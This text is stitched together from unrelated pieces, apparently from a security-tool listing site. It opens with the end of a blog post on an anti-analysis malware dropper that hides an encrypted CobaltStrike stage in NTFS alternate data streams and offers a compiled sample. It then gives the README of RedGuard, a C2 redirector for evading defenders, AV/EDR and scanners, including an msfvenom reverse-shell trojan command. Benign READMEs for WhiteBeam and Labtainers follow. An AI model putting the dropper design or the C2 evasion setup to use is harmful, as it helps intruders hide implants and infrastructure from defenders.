  4. Reads Stage2 from Stage1's ADS into memory.
  5. Decrypts Stage2 using the victim-specific AES Key/IV.
  6. Checks first two bytes of decryted Stage2 buffer; if not MZ (unsuccessful decryption), delete Stage1/Stage2, exit.
  7. Writes decrypted Stage2 back to disk as ADS of Stage1
  8. Calls CreateProcess on Stage2. If this fails (unsuccessful decryption), delete Stage1/Stage2, exit.
  9. Sleeps 5 seconds to allow Stage2 to execute + exit so it can be overwritten.
  10. Encrypts Stage2 using victim-specific AES Key/IV
  11. Writes encrypted Stage2 back to disk as ADS of Stage1.

Note that Stage2 MUST exit in order for it to be overwritten; the self-deletion trick does not appear to work on files that are already ADS's, as the self-deletion technique relies on renaming the primary data stream of the executable. Stage2 will ideally be an inject or spawn+inject executable.

There are two points that Stage1 could detect that it is not being ran from the same victim and delete itself/Stage2 in order to protect the threat actor. The first is the check for the executable header after decrypting Stage2 using the gathered environmental information; in theory this step could be bypassed by a reverse engineer, but it is a first good check. The second protection point is the result of the CreateProcess call- if it fails because Stage2 was not properly decrypted, the malware is similiary deleted. The result of this call could also be modified to prevent deletion by the reverse engineer, however this doesn't change the fact that Stage2 is encrypted and inaccessible.

Stage2

Stage2 is the meat and potatoes of the malware chain; It is a fully fledged shellcode runner/piece of malware itself. By encrypting and protecting it in the way that we have, the actions of the end state malware are much better obfuscated and protected from reverse engineers and malware analysts. During development I used one of my existing shellcode runners containing CobaltStrike shellcode, but this could be anything the attacker wants to run and protect.

Impact, Mitigation, and Further Work

So what is actually accomplished with a malware lifecycle like this? There are a few interesting quirks to talk about.

Alternate data streams are a feature unique to NTFS file systems; this means that most ways of transfering the malware after initial infection will strip and lose Stage2 because it is an ADS of Stage1. Special care would have to be given in order to transfer the sample in order to preserve Stage2, as without it a lot of reverse engineers and malware analysts are going to be very confused as to what is happening. RAR archives are able to preserve ADS's and tools like 7Z and Peazip can extract files and their ADS's.

As previously mentioned, by the time malware using this lifecycle hits a Blue Teamer it should be at Stage1; Stage0 has come and gone, and Stage2 is already encrypted with the environmental information gathered by stage 0. Not knowing that Stage0 even existed will add considerable uncertainty to understanding the lifecycle and decrypting Stage2.

In theory (because again I have no reversing experience), Stage1 should be able to be reversed (after the Blue Teamers rolls through a few copies of it because it keeps deleting itself) and the information that Stage1 gathers from the target system should be able to be identified. Provided a well-orchestrated response, Blue Team should be able to identify the victim that the malware came from and go and gather that information from it and feed it into the program so that it may be transformed appropriately into the AES Key/IV that decrypts Stage2. There are a lot "ifs" in there however related to the relative skill of the reverse engineer as well as the victim machine being available for that information to be recovered.

Application Whitelisting would significantly frustrate this lifecycle. Stage0/Stage1 may be able to be side loaded as a DLL, however I suspect that Stage2 as an ADS would present some issues. I do not have an environment to test malware against AWL nor have I bothered porting this all to DLL format so I cannot say. I am sure there are creative ways around these issues.

I am also fairly confident that there are smarter ways to run Stage2 than dropping to disk and calling CreateProcess; Either manually mapping the executable or using a tool like Donut to turn it into shellcode seem like reasonable ideas.

Code and binary

During development I created a Builder application that Stage1 and Stage2 may be fed to in order to produce a functional Stage0; this will not be provided however I will be providing most of the source code for stage1 as it is the piece that would be most visible to a Blue Teamer. Stage0 will be excluded as an exercise for the reader, and stage2 is whatever standalone executable you want to run+protect. This POC may be further researched at the effort and discretion of able readers.

I will be providing a compiled copy of this malware as Dropper64.exe. Dropper64.exe is compiled for x64. Dropper64.exe is Stage0; it contains Stage1 and Stage2. On execution, Stage1 and Stage2 will drop to disk but will NOT automatically execute, you must run Dropper64.exe(now Stage1) again. Stage2 is an x64 version of calc.exe. I am including this for any Blue Teamers who want to take a look at this, but keep in mind in an incident response scenario 99& of the time you will be getting Stage1/Stage2, Stage0 will be gone.

Conclusion

This was an interesting pet project that ate up a long weekend. I'm sure it would be a lot more advanced/more complete if I had experience in a debugger and disassembler, but you do the best with what you have. I am eager to hear from Blue Teamers and other Malware Devs what they think. I am sure I have over-complicatedly re-invented the wheel here given what actual APT's are doing, but I learned a few things along the way. Thank you for reading!



RedGuard - C2 Front Flow Control Tool, Can Avoid Blue Teams, AVs, EDRs Check


0x00 Introduction

Tool introduction

RedGuard is a derivative work of the C2 facility pre-flow control technology. It has a lighter design, efficient flow interaction, and reliable compatibility with go language development. The core problem it solves is also in the face of increasingly complex red and blue attack and defense drills, giving the attack team a better C2 infrastructure concealment scheme, giving the interactive traffic of the C2 facility a flow control function, and intercepting those "malicious" analysis traffic, and better complete the entire attack mission.

RedGuard is a C2 facility pre-flow control tool that can avoid Blue Team, AVS, EDR, Cyberspace Search Engine checks.


Application scenarios

  • During the offensive and defensive drills, the defender analyzes and traces the source of C2 interaction traffic according to the situational awareness platform
  • Identify and prevent malicious analysis of Trojan samples in cloud sandbox environment based on JA3 fingerprint library
  • Block malicious requests to implement replay attacks and achieve the effect of confusing online
  • In the case of specifying the IP of the online server, the request to access the interactive traffic is restricted by means of a whitelist
  • Prevent the scanning and identification of C2 facilities by cyberspace mapping technology, and redirect or intercept the traffic of scanning probes
  • Supports pre-flow control for multiple C2 servers, and can achieve the effect of domain front-end, load balancing online, and achieve the effect of concealment
  • Able to perform regional host online restriction according to the attribution of IP address by requesting IP reverse lookup API interface
  • Resolve strong features of staged checksum8 rule path parsing without changing the source code.
  • Analyze blue team tracing behavior through interception logs of target requests, which can be used to track peer connection events/issues
  • It has the function of customizing the time period for the legal interaction of the sample to realize the function of only conducting traffic interaction during the working time period
  • Malleable C2 Profile parser capable of validating inbound HTTP/S requests strictly against malleable profile and dropping outgoing packets in case of violation (supports Malleable Profiles 4.0+)
  • Built-in blacklist of IPV4 addresses for a large number of devices, honeypots, and cloud sandboxes associated with security vendors to automatically intercept redirection request traffic
  • SSL certificate information and redirect URLs that can interact with samples through custom tools to circumvent the fixed characteristics of tool traffic
  • ..........

0x01 Install

You can directly download and use the compiled version, or you can download the go package remotely for independent compilation and execution.

git clone https://github.com/wikiZ/RedGuard.git
cd RedGuard
# You can also use upx to compress the compiled file size
go build -ldflags "-s -w" -trimpath
# Give the tool executable permission and perform initialization operations
chmod +x ./RedGuard&&./RedGuard

0x02 Configuration Description

initialization

As shown in the figure below, first grant executable permissions to RedGuard and perform initialization operations. The first run will generate a configuration file in the current user directory to achieve flexible function configuration. Configuration file name: .RedGuard_CobaltStrike.ini.


Configuration file content:


The configuration options of cert are mainly for the configuration information of the HTTPS traffic exchange certificate between the sample and the C2 front-end facility. The proxy is mainly used to configure the control options in the reverse proxy traffic. The specific use will be explained in detail below.

The SSL certificate used in the traffic interaction will be generated in the cert-rsa/ directory under the directory where RedGuard is executed. You can start and stop the basic functions of the tool by modifying the configuration file (the serial number of the certificate is generated according to the timestamp , don't worry about being associated with this feature).If you want to use your own certificate,Just rename them to ca.crt and ca.key.

openssl x509 -in ca.crt -noout -text


Random TLS JARM fingerprints are updated each time RedGuard is started to prevent this from being used to authenticate C2 facilities.


In the case of using your own certificate, modify the HasCert parameter in the configuration file to true to prevent normal communication problems caused by the incompatibility of the CipherSuites encryption suite with the custom certificate caused by the randomization of JARM confusion.

# Whether to use the certificate you have applied for true/false
HasCert = false

RedGuard Usage

root@VM-4-13-ubuntu:~# ./RedGuard -h

Usage of ./RedGuard:
-DropAction string
RedGuard interception action (default "redirect")
-EdgeHost string
Set Edge Host Communication Domain (default "*")
-EdgeTarget string
Set Edge Host Proxy Target (default "*")
-HasCert string
Whether to use the certificate you have applied for (default "true")
-allowIP string
Proxy Requests Allow IP (default "*")
-allowLocation string
Proxy Requests Allow Location (default "*")
-allowTime string
Proxy Requests Allow Time (default "*")
-common string
Cert CommonName (default "*.aliyun.com")
-config string
Set Config Path
-country string
Cert Country (default "CN")
-dns string
Cert DNSName
-host string
Set Proxy HostTarget
-http string
Set Proxy HTTP Port ( default ":80")
-https string
Set Proxy HTTPS Port (default ":443")
-ip string
IPLookUP IP
-locality string
Cert Locality (default "HangZhou")
-location string
IPLookUP Location (default "้ฃŽ่ตท")
-malleable string
Set Proxy Requests Filter Malleable File (default "*")
-organization string
Cert Organization (default "Alibaba (China) Technology Co., Ltd.")
-redirect string
Proxy redirect URL (default "https://360.net")
-type string
C2 Server Type (default "CobaltStrike")
-u Enable configuration file modification

**P.S. You can use the parameter command to modify the configuration file. Of course, I think it may be more convenient to modify it manually with vim. **

0x03 Tool usage

basic interception

If you directly access the port of the reverse proxy, the interception rule will be triggered. Here you can see the root directory of the client request through the output log, but because the request process does not carry the requested credentials, that is, the correct HOST request header So the basic interception rule is triggered, and the traffic is redirected to https://360.net

Here, in order to facilitate the display of the output effect, the actual use can be run in the background through nohup ./RedGuard &.


{"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"}

It is not difficult to see from the above slice that 360.net corresponds to the proxy to the local port 8080, 360.com points to the local port 4433, and corresponds to the difference in the HTTP protocol used. In the subsequent online, you need to pay attention to the protocol of the listener. The type needs to be consistent with the one set here, and set the corresponding HOST request header.


As shown in the figure above, in the case of unauthorized access, the response information we get is also the return information of the redirected site.

interception method

In the above basic interception case, the default interception method is used, that is, the illegal traffic is intercepted by redirection. By modifying the configuration file, we can change the interception method and the redirected site URL. In fact, this The other way is a redirect, which might be more aptly described as hijacking, cloning, since the response status code returned is 200, and the response is taken from another website to mimic the cloned/hijacked website as closely as possible.

Invalid packets can be misrouted according to three strategies:

  • reset: Terminate the TCP connection immediately.
  • proxy: Get a response from another website to mimic the cloned/hijacked website as closely as possible.
  • redirect: redirect to the specified website and return HTTP status code 302, there is no requirement for the redirected website.
# RedGuard interception action: redirect / rest / proxy (Hijack HTTP Response)
drop_action = proxy
# URL to redirect to
Redirect = https://360.net

Redirect = URL in the configuration file points to the hijacked URL address. RedGuard supports "hot change", which means that while the tool is running in the background through nohup, we can still modify the configuration file. The content is started and stopped in real time.

./RedGuard -u --drop true

Note that when modifying the configuration file through the command line. The -u option should not be too small, otherwise the configuration file cannot be modified successfully. If you need to restore the default configuration file settings, you only need to enter ./RedGuard -u.

Another interception method is DROP, which directly closes the HTTP communication response and is enabled by setting DROP = true. The specific interception effect is as follows:


It can be seen that the C2 pre-flow control directly responds to illegal requests without the HTTP response code. In the detection of cyberspace mapping, the DROP method can achieve the function of hiding the opening of ports. The specific effect can be seen in the following case. analyze.

Proxy port modification

In fact, it is easy to understand here. The configuration of the following two parameters in the configuration file realizes the effect of changing the reverse proxy port. It is recommended to use the default port on the premise of not conflicting with the current server port. If it must be modified, then pay attention to the : of the parameter value not to be missing

# HTTPS Reverse proxy port
Port_HTTPS = :443
# HTTP Reverse proxy port
Port_HTTP = :80

RedGuard logs

The blue team tracing behavior is analyzed through the interception log of the target request, which can be used to track peer connection events/problems. The log file is generated in the directory where RedGuard is running, file name: RedGuard.log.

ย 

RedGuard Obtain the real IP address

This section describes how to configure RG to obtain the real IP address of a request. You only need to add the following configuration to the profile of the C2 device, that is, to obtain the real IP address of the target through the request header X-Forwarded-For.

http-config {
set trust_x_forwarded_for "true";
}

Request geographic restrictions

The configuration method takes AllowLocation = Jinan, Beijing as an example. It is worth noting here that RedGuard provides two APIs for IP attribution anti-check, one for domestic users and the other for overseas users. Dynamically assign which API to use. If the target is in China, enter Chinese for the set region. Otherwise, enter English place names. It is recommended that domestic users use Chinese names. In this way, the accuracy of the attribution found and the response speed of the API are both is the best choice.

P.S. Domestic users, do not use AllowLocation = Jinan,beijing this way! It doesn't make much sense, the first character of the parameter value determines which API to use!

# IP address owning restrictions example:AllowLocation = ๅฑฑไธœ,ไธŠๆตท,ๆญๅทž or shanghai,beijing
AllowLocation = *

ย 

Before deciding to restrict the region, you can manually query the IP address by the following command.

./RedGuard --ip 111.14.218.206
./RedGuard --ip 111.14.218.206 --location shandong # Use overseas API to query

Here we set to allow only the Shandong region to go online

ย 

Legit traffic:

ย 

Illegal request area:

ย 

Regarding the launch of geographical restrictions, it may be more practical in the current offensive and defensive drills. Basically, the targets of provincial and municipal protection network restrictions are in designated areas, and the traffic requested by other areas can naturally be ignored, and the function of RedGuard is Not only can a single region be restricted, but multiple online regions can be restricted based on provinces and cities, and traffic requested by other regions can be intercepted.

Blocking based on whitelist

In addition to the built-in blacklist of security vendor IPs in RedGuard, we can also restrict according to the whitelist. In fact, I also suggest that when doing web management, we can restrict the addresses of the online IPs according to the whitelist, so as to divide multiple IPs way of address.

# Whitelist list example: AllowIP = 172.16.1.1,192.168.1.1
AllowIP = 127.0.0.1

ย 

As shown in the figure above, we only allow 127.0.0.1 to go online, then the request traffic of other IPs will be intercepted.

Block based on time period

This function is more interesting. Setting the following parameter values in the configuration file means that the traffic control facility can only go online from 8:00 am to 9:00 pm. The specific application scenario here is that during the specified attack time, we allow communication with C2 Traffic interacts, and remains silent at other times. This also allows the red teams to get a good night's sleep without worrying about some blue team on the night shift being bored to analyze your Trojan and then wake up to something indescribable, hahaha.

# Limit the time of requests example: AllowTime = 8:00 - 16:00
AllowTime = 8:00 - 21๏ผš00


Malleable Profile

RedGuard uses the Malleable C2 profile. It then parses the provided malleable configuration file section to understand the contract and pass only those inbound requests that satisfy it, while misleading others. Parts such as http-stager, http-get and http-post and their corresponding uris, headers, User-Agent etc. are used to distinguish legitimate beacon requests from irrelevant Internet noise or IR/AV/EDR Out-of-bounds packet.

# C2 Malleable File Path
MalleableFile = /root/cobaltstrike/Malleable.profile


The profile written by ้ฃŽ่ตท is recommended to use:

https://github.com/wikiZ/CobaltStrike-Malleable-Profile

0x04 Case Study

Cyberspace Search Engine

As shown in the figure below, when our interception rule is set to DROP, the spatial mapping system probe will probe the / directory of our reverse proxy port several times. In theory, the request packet sent by mapping is faked as normal traffic. Show. But after several attempts, because the characteristics of the request packet do not meet the release requirements of RedGuard, they are all responded by Close HTTP. The final effect displayed on the surveying and mapping platform is that the reverse proxy port is not open.

ย 

The traffic shown in the figure below means that when the interception rule is set to Redirect, we will find that when the mapping probe receives a response, it will continue to scan our directory. UserAgent is random, which seems to be in line with normal traffic requests, but both successfully blocked.


Mapping Platform - Hijack Response Intercept Mode Effect:


Surveying and mapping platform - effect of redirection interception:


Domain fronting

RedGuard supports Domain fronting. In my opinion, there are two forms of presentation. One is to use the traditional Domain fronting method, which can be achieved by setting the port of our reverse proxy in the site-wide acceleration back-to-source address. On the original basis, the function of traffic control is added to the domain fronting, and it can be redirected to the specified URL according to the setting we set to make it look more real. It should be noted that the RedGuard setting of the HTTPS HOST header must be consistent with the domain name of the site-wide acceleration.


In individual combat, I suggest that the above method can be used, and in team tasks, it can also be achieved by self-built "Domain fronting".

ย 

In the self-built Domain fronting, keep multiple reverse proxy ports consistent, and the HOST header consistently points to the real C2 server listening port of the backend. In this way, our real C2 server can be well hidden, and the server of the reverse proxy can only open the proxy port by configuring the firewall.


This can be achieved through multiple node servers, and configure multiple IPs of our nodes in the CS listener HTTPS online IP.

Edge Node

RedGuard 22.08.03 updated the edge host online settings - custom intranet host interaction domain name, and the edge host uses the domain front CDN node interaction. The asymmetry of the information exchanged between the two hosts is achieved, making it more difficult to trace the source and make it difficult to check.


CobaltStrike

If there is a problem with the above method, the actual online C2 server cannot be directly intercepted by the firewall, because the actual load balancing request in the reverse proxy is made by the IP of the cloud server manufacturer.

If it is a single soldier, we can set an interception strategy on the cloud server firewall.


Then set the address pointed to by the proxy to https://127.0.0.1:4433.

{"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"}

And because our basic verification is based on the HTTP HOST request header, what we see in the HTTP traffic is also the same as the domain fronting method, but the cost is lower, and only one cloud server is needed.

ย 

For the listener settings, the online port is set to the RedGuard reverse proxy port, and the listening port is the actual online port of the local machine.

Metasploit

Generates Trojan

$ msfvenom -p windows/meterpreter/reverse_https LHOST=vpsip LPORT=443 HttpHostHeader=360.com 
-f exe -o ~/path/to/payload.exe

Of course, as a domain fronting scenario, you can also configure your LHOST to use any domain name of the manufacturer's CDN, and pay attention to setting the HttpHostHeader to match RedGuard.

setg OverrideLHOST 360.com
setg OverrideLPORT 443
setg OverrideRequestHost true

It is important to note that the OverrideRequestHost setting must be set to true. This is due to a quirk in the way Metasploit handles incoming HTTP/S requests by default when generating configuration for staging payloads. By default, Metasploit uses the incoming request's Host header value (if present) for second-stage configuration instead of the LHOST parameter. Therefore, the build stage is configured to send requests directly to your hidden domain name because CloudFront passes your internal domain in the Host header of forwarded requests. This is clearly not what we are asking for. Using the OverrideRequestHost configuration value, we can force Metasploit to ignore the incoming Host header and instead use the LHOST configuration value pointing to the origin CloudFront domain.

The listener is set to the actual line port that matches the address RedGuard actually forwards to.

ย 

RedGuard received the request:


0x05 Loading

Thank you for your support. RedGuard will continue to improve and update it. I hope that RedGuard can be known to more security practitioners. The tool refers to the design ideas of RedWarden.

**We welcome everyone to put forward your needs, RedGuard will continue to grow and improve in these needs! **

About the developer ้ฃŽ่ตท related articles:https://www.anquanke.com/member.html?memberId=148652

2022Kcon Author of the weapon spectrum of the hacker conference

The 10th ISC Internet Security Conference Advanced Offensive and Defense Forum "C2 Front Flow Control" topic

https://isc.n.cn/m/pages/live/index?channel_id=iscyY043&ncode=UR6KZ&room_id=1981905&server_id=785016&tab_id=253

Analysis of cloud sandbox flow identification technology

https://www.anquanke.com/post/id/277431

Realization of JARM Fingerprint Randomization Technology

https://www.anquanke.com/post/id/276546

Kunyu: https://github.com/knownsec/Kunyu

้ฃŽ่ตทไบŽ้’่ไน‹ๆœซ๏ผŒๆตชๆˆไบŽๅพฎๆพœไน‹้—ดใ€‚

0x06 Community

If you have any questions or requirements, you can submit an issue under the project, or contact the tool author by adding WeChat.




WhiteBeam - Transparent Endpoint Security


Transparent endpoint security

Features

  • Block and detect advanced attacks
  • Modern audited cryptography: RustCrypto for hashing and encryption
  • Highly compatible: Development focused on all platforms (incl. legacy) and architectures
  • Source available: Audits welcome
  • Reviewed by security researchers with combined 100+ years of experience

In Action

Installation

From Packages (Linux)

Distro-specific packages have not been released yet for WhiteBeam, check again soon!

From Releases (Linux)

  1. Download the latest release
  2. Ensure the release file hash matches the official hashes (How-to)
  3. Install:
    • ./whitebeam-installer install

From Source (Linux)

  1. Run tests (Optional):
    • cargo run test
  2. Compile:
    • cargo run build
  3. Install WhiteBeam:
    • cargo run install

Quick start

  1. Become root (sudo su/su root)
  2. Set a recovery secret. You'll be able to use this with whitebeam --auth to make changes to the system: whitebeam --setting RecoverySecret mask

How to Detect Attacks with WhiteBeam

Multiple guides are provided depending on your preference. Contact us so we can help you integrate WhiteBeam with your environment.

  1. Serverless guide, for passive review
  2. osquery Fleet setup guide, for passive review
  3. WhiteBeam Server setup guide, for active response

How to Prevent Attacks with WhiteBeam

WhiteBeam is experimental software. Contact us for assistance safely implementing it.
  1. Become root (sudo su/su root)
  2. Review the baseline at least 24 hours after installing WhiteBeam:
    • whitebeam --baseline
  3. Add trusted behavior to the whitelist, following the whitelisting guide
  4. Enable WhiteBeam prevention:
    • whitebeam --setting Prevention true


Labtainers - A Docker-based Cyber Lab Framework


Labtainers include more than 50 cyber lab exercises and tools to build your own. Import a single VM appliance or install on a Linux system and your students are done with provisioning and administrative setup, for these and future lab exercises.

  • Consistent lab execution environments and automated provisioning via Docker containers
  • Multi-component network topologies on a modestly performing laptop computer
  • Automated assessment of student lab activity and progress
  • Individualized lab exercises to discourage sharing solutions

Labtainers provide controlled and consistent execution environments in which students perform labs entirely within the confines of their computer, regardless of the Linux distribution and packages installed on the student's computer. Labtainers run on our [VM appliance][vm-appliancee], or on any Linux with Dockers installed. And Labtainers is available as cloud-based VMs, e.g., on Azure as described in the Student Guide.

See the Student Guide for installation and use, and the Instructor Guide for student assessment. Developing and customizing lab exercises is described in the Designer Guide. See the Papers for additional information about the framework. The Labtainers website, and downloads (including VM appliances with Labtainers pre-installed) are at https://nps.edu/web/c3o/labtainers.

Distribution created: 03/25/2022 09:37
Revision: v1.3.7c
Commit: 626ea075
Branch: master


Distribution and Use

Please see the licensing and distribution information in the docs/license.md file.

Guide to directories

  • scripts/labtainers-student -- the work directory for running and testing student labs. You must be in that directory to run student labs.

  • scripts/labtainers-instructor -- the work directory for running and testing automated assessment and viewing student results.

  • labs -- Files specific to each of the labs

  • setup_scripts -- scripts for installing Labtainers and Docker and updating Labtainers

  • docs -- latex source for the labdesigner.pdf, and other documentation.

  • UI -- Labtainers lab editor source code (Java).

  • headless-lite -- scripts for managing Docker Workstation and cloud instances of Labtainers (systems that do not have native X11 servers.)

  • scripts/designer -- Tools for building new labs and managing base Docker images.

  • config -- system-wide configuration settings (these are not the lab-specific configuration settings.

  • distrib -- distribution support scripts, e.g., for publishing labs to the Docker hub.

  • testsets -- Test procedures and expected results. (Per-lab drivers for SimLab are not distributed).

  • pkg-mirrors -- utility scripts for internal NPS package mirroring to reduce external package pulling during tests and distribution.

Support

Use the GitHub issue reports, or email me at mfthomps@nps.edu

Also see https://my.nps.edu/web/c3o/support1

Release notes

The standard Labtainers distribution does not include files required for development of new labs. For those, run ./update-designer.sh from the labtainer/trunk/setup_scripts directory.

The installation script and the update-designer.sh script set environment variables, so you may want to logout/login, or start a new bash shell before using Labtainers the first time.

March 23, 2022

  • Fix path to tap lock directory; was causing failure of labs using network taps
  • Update plc-traffic netmon computer to have openjfx needed for new grassmarlin in java environment
  • Speed up lab startup by avoiding chown -R, which is very slow in docker.
  • Another shot at avoiding deletion of the X11 link in container /tmp directory.
  • Fix webtrack counting of sites visited and remove live-headers goal, that tool is no longer available. Clarified some lab manual steps.

March 2, 2022

  • Add new ssh-tunnel lab (thanks GWD!)
  • Fix labedit failure to reflect X11 value set by new_lab_setup
  • Add option to not parameterize a container

February 23, 2022

  • labedit was corrupting start.config after addition of new containers
  • Incorrect path to student guide in the student README file; dynamically change for cloud configs
  • Incorrect extension to update-labtainer.sh
  • Msc guide enahancements
  • Update the ghidra lab to include version 10.1.2 of Ghidra

February 15, 2022

  • Revert Azure cloud support to provision for each student. Azure discourages sharing resources.

January 24, 2022

  • Azure cloud now uses image stored in an Azure blob instead of provisioning for each student.
  • Added support for Google Cloud.

January 19, 2022

  • Introduce Labtainers on the Azure cloud. See the Student Guide for details on how to use this.

January 3, 2022

  • Revise setuid-env lab to add better assessment; simlab testing and avoid sighup in the printenv child.
  • Fix assessment goal count directive to exclude result tag values of false.
  • Do not require labname when using gradelab -a with a grader started with the debug option.
  • Revise capinout (stdin/stdout mirroring) to handle orphaning of command process children, improved documentation and error handling.
  • Added display of progress bars of docker images being pulled when a lab is first run.
  • User feedback on progress of container initialization.
  • The pcap-lib lab was missing a notify file needed for automated assessment; Remove extraneous step from Lab Manual.

November 23, 2021

  • Disable ubuntu popup errors on test VM.
  • Fix handling of different DISPLAY variable formats.

October 22, 2021

  • Revise the tcpip lab guide to note a successful syn-flood attack is not possible. Fix its automated assessment and add SimLab scripts.
  • Change artifact file extension from zip to lab, and add a preamble to confuse GUI file managers. Students were opening the zip and submitting its guts.
  • Make the -r option to gradelab the default, add a -c option for cumulative use of grader.
  • Modify refresh_mirror to refer to the local release date to avoid frequent queries of DockerHub. Each such query counts as an image pull, and they are now trying to monetize those.

September 30, 2021

  • Change bufoverflow lab guide and grading to not expect success with ASLR turned on, assess whether it was run.
  • Error handling for web grader for cases where student lacks results.
  • Print warning when deprecated lab is run.
  • Change formatstring grading to remove unused "_leaked_secret" description and clarify value of leaked_no_scanf.
  • Also change formatstring grading to allow any name for the vulnerable executable.

September 29, 2021

  • Gradelab error handling, reduce instances of crashes due to bad zip files.
  • Limit stdout artifact files to 1MB

September 17, 2021

  • Ghidra lab guide had wrong IP address, was not remade from source.

September 14, 2021

  • Example labs for LDAP and Mariadb using SSL. Intended as templates for new labs.
  • Handle Mariadb log format
  • Add per-container parameters to limit CPU use or pin container to CPU set.
  • Labpack creation now available via a GUI (makepackui).
  • Tab completion for the labtainer, labpack and gradelab commands.
  • New parallel computing lab ``parallel'' using MPI.

August 3, 2021

  • Add a "WAIT_FOR" configuration option to cause a container to delay parameterization until another container completes its parameterization.
  • Support for Mariadb log formats in results parsing
  • Remove support for Mac and Windows use of Docker Desktop. That product is too unstable for us to support.
  • Supress stderr messages when user uses built-in bash commands such as "which".
  • Bug fixes to makepack/labpack programs.

July 19, 2021

  • Add a DNS lab to introduce the DNS protocol and configuration.
  • Revised VirtualBox appliance image to start with the correct update script.
  • Split resolv.conf nameserver parameter out of the lab_gw configuration field into its own value.
  • IModule command failed if run before any labs had been started.

July 5, 2021

  • Errors in DISPLAY env variable management broke GUI applications on Docker Desktop.

July 1, 2021

  • Support Mac package installation of headless Labtainers.
  • The routing-basics lab automated assessment failed due to lack of treataslocal files
  • Correct typos and incorrect addresses in routing-basics lab, and fix automated assessment.
  • Assessment of pcapanalysis was failing.

June 10, 2021

  • All lab manual PDFs are now in the github repo
  • Convert vpnlab and vpnlab2 instructions to PDF lab manuals.

May 25, 2021

  • Add searchable keywords to each lab. See "labtainer -h" for usage.
  • Expand routing-basics lab and lab manual
  • Remove routing-basics2 lab, it is now redundant.
  • sudo on some containers failed because hostnames remove underscores, leading to mismatch with the hosts file. Fix with extra entry in the hosts file with container name sans underscore.
  • New Labpack feature to package a collection of labs, and makepack tool to create Labpacks.
  • Error check for /sbin directory when using ubuntu20 -- would be silently fatal.
  • New network-basics lab

May 5, 2021

  • Introduce a new users lab to introduce user/group management
  • Surpress Apparmor host messages in centos container syslogs

April 28, 2021

  • New base2 images lacked man pages. Used unminimize to restore them in the base image.
  • Introduce a OSSEC host-based IDS lab.

April 13, 2021

  • CyberCIEGE lab failed because X11 socket was not relocated prior to starting Wine via fixlocal.

April 9, 2021

  • New gdb-cpp tutorial lab for using GDB on a simple C++ program.
  • Floating point exceptions were revealing use of exec_wrap.sh for stdin/stdout mirroring.

April 7, 2021

  • ldap lab failed when moved to Ubuntu 20. Problem traced to problem with nscd cache of pwd. Move ldap to Ubuntu 20

March 23, 2021

  • Parameterizing with RANDOM did not include the upper bound.
  • Add optional step parameter to RANDOM, e.g., to ensure word boundaries.
  • db-access lab: add mysql-workbench to database computer.
  • New overrun lab to illustrate memory references beyond bounds of c data structures.
  • New printf lab to introduce memory references made by the printf function.

March 19, 2021

  • gradelab ignore makdirs error, problem with Windows rmtree on shared folders.
  • gradelab handle spaces in student zip file names.
  • gradelab handle zip file names from Moodle, including build downloads.

March 12, 2021

  • labedit UI: Remove old wireshark image from list of base images.
  • labedit UI: Increase some font sizes.
  • grader web interface failed to display lab manuals if the manual name does not follow naming conventions.

March 11, 2021

  • labedit UI add registry setting in new global lab configuration panel.

March 10, 2021

  • labedit UI fixes to not build if syntax error in lab
  • labedit UI "Lab running" indicator fix to reflect current lab.

March 8, 2021

  • Deprecate use of HOST_HOME_XFER, all labs use directory per the labtainer.config file.
  • Add documentation comment to start.config for REGISTRY and BASE_REGISTRY

March 5, 2021

  • Error handling on gradelab web interface when missing results.
  • labedit addition of precheck, msc bug fixes.

February 26, 2021

  • The dmz-example lab had errors in routing and setup of dnsmasq on some components.

February 18, 2021

  • UI was rebuilding images because it was updating file times without cause
  • Clean up UI code to remove some redundant data copies.

February 14, 2021

  • Add local build option to UI
  • Create empty faux_init for centos6 bases.

February 11, 2021

  • Fix UI handling of editing files. Revise layout and eliminate unused fields.
  • Add ubuntu20 base2 base configuration along with ssh2, network2 and wireshark2
  • The new wireshark solves the prolem of black/noise windows.
  • Map /tmp/.X11-unix to /var/tmp and create a link. Needed for ubuntu20 (was deleting /tmp?) and may fix others.

February 4, 2021

  • Add SIZE option to results artifacts
  • Simplify wireshark-intro assessment and parameterization and add PDF lab manual.
  • Provide parameter list values to pregrade.sh script as environment variables
  • enable X11 on the grader
  • put update-designer.sh into users path.

January 19, 2021

  • Change management of README date/rev to update file in source repo.
  • Introduce GUI for creating/editing labs -- see labedit command.

December 21, 2020

  • The gradelab function failed when zip files were copied from a VirtualBox shared folder.
  • Update Instructor Guide to describe management of student zip files on host computers.

December 4, 2020

  • Transition distribution of tar to GitHub releaese artifacts
  • Eliminate seperate designer tar file, use git repo tarball.
  • Testing of grader web functions for analysis of student lab artifacts
  • Clear logs from full smoketest and delete grader container in removelab command.

December 1, 2020

  • The iptables2 lab assessment relied on random ports being "unknown" to nmap.
  • Use a sync diretory to delay smoketests from starting prior to lab startup.
  • Begin integrating Lab designer UI elements.

October 13, 2020

  • Headless configuraions for running on Docker Desktop on Macs & Windows
  • Headless server support, cloud-config file for cloud deployments
  • Testing support for headless configurations
  • Force mynotify to wait until rc.local runs on boot
  • Improve mynotify service ability to merge output into single timestamp
  • Python3 for stopgrade script
  • SimLab now uses docker top rather than system ps

September 26, 2020

  • Clean up the stoplab scripts to ignore non-lab containers
  • Add db-access database access control lab for controlles sharing of a mysql db.

September 17, 2020

  • The macs-hash lab was unable to run Leafpad due to the X11 setting.
  • Grader logging was being redirected to the wrong log file, now captures errors from instructor.py
  • Copy instructor.log from grader to the host logs directory if there is an error.

August 28, 2020

  • Fix install script to use python3-pip and fix broken scripts: getinfo.py and pull-all.py
  • Registry logic was broken, test systems were not using the test registry, add development documentation.
  • Add juiceshop and owasp base files for OWASP-based web security labs
  • Remove unnecessary sudos from check_nets
  • Add CHECK_OK documentation directive for automated assessment
  • Change check_nets to fix iptables and routing issues if so directed.

August 12, 2020

  • Add timeout to prestop scripts
  • Add quiz and checkwork to dmz-lab
  • Restarting the dmz-lab without -r option broke routing out of the ISP.
  • Allow multiple files for time_delim results.

August 6, 2020

  • Bug in error handling when X11 socket is missing
  • Commas in quiz questions led to parse errors
  • Add quiz and checkwork to iptables2 lab

July 28, 2020

  • Add quiz support -- these are guidance quizzes, not assessment quizzes. See the designer guide.
  • Add current-state assessment for use with the checkwork command.

July 21, 2020

  • Add testsets/bin to designer's path
  • Designer guide corrections and explainations for IModule steps.
  • Add RANGE_REGEX result type for defining time ranges using regular expressions on log entries.
  • Check that X11 socket exists if it is needed when starting a lab.
  • Add base image for mysql
